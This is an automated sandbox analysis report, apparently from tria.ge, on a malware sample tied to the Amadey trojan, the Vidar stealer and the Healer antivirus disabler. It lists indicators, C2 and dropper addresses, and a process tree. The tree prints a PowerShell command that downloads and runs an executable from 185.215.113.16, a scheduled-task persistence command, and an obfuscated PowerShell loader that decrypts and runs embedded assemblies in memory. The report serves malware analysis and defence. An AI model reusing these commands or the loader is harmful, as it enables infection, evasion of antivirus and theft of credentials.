Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250207-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08/02/2025, 07:07

General

  • Target

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe

  • Size

    938KB

  • MD5

    d77cd6108c4916eb0cc768426b0bf4ad

  • SHA1

    54e3f788bd1d1a1087459170b0c0f24197565f72

  • SHA256

    bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f

  • SHA512

    22b81e6a3cbd5eae12e7e856b7c79432327978a53046d6099f4e3b957c6cbfe3264a1fcf073eb04beedcee6ff28b63ff60379429d32f1aaeafd1aee8ea63c5ea

  • SSDEEP

    24576:aqDEvCTbMWu7rQYlBQcBiT6rprG8ayDFh:aTvC/MTQYxsWR7ayDX

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 9 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of FindShellTrayWindow 57 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe
    "C:\Users\Admin\AppData\Local\Temp\bc91093c32dadee336700250ed78bf975898df74e4a95307741afa71dc3c3f8f.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn qMNiEmakmJD /tr "mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2776
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\DsdV07JDv.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'IJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3088
        • C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE
          "C:\Users\Admin\AppData\Local\TempIJ2TQBMBEWVSNBQDZ6ZUVLNSEPHDNKY3.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1196
          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
            "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4040
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072393041\b6V4Rod.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:2196
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2324
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:4656
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • Blocklisted process makes network request
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4836
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:708
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1072396041\b6V4Rod.ps1"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops startup file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3244
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4332
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); "
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1912
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1464
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3208
            • C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe
              "C:\Users\Admin\AppData\Local\Temp\1072397001\Bjkm5hE.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4624
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                7⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:668
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffe982cc40,0x7fffe982cc4c,0x7fffe982cc58
                  8⤵
                    PID:1856
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1936 /prefetch:2
                    8⤵
                      PID:2724
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2204,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2176 /prefetch:3
                      8⤵
                        PID:4816
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2456 /prefetch:8
                        8⤵
                          PID:3868
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3216 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:4196
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3276 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:1436
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4520,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4548 /prefetch:1
                          8⤵
                          • Uses browser remote debugging
                          PID:3840
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4516,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4772 /prefetch:8
                          8⤵
                            PID:3796
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4784 /prefetch:8
                            8⤵
                              PID:3956
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4872 /prefetch:8
                              8⤵
                                PID:2636
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5008,i,15343649196427875020,3844241806098505252,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4756 /prefetch:8
                                8⤵
                                  PID:2900
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                7⤵
                                • Uses browser remote debugging
                                • Enumerates system info in registry
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                • Suspicious use of FindShellTrayWindow
                                PID:4996
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffe98346f8,0x7fffe9834708,0x7fffe9834718
                                  8⤵
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:1876
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
                                  8⤵
                                    PID:448
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:3
                                    8⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4900
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
                                    8⤵
                                      PID:3684
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:1940
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:3352
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:4032
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,12529070228834641478,7711439843177723746,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:1
                                      8⤵
                                      • Uses browser remote debugging
                                      PID:384
                                • C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1072398001\7fOMOTQ.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
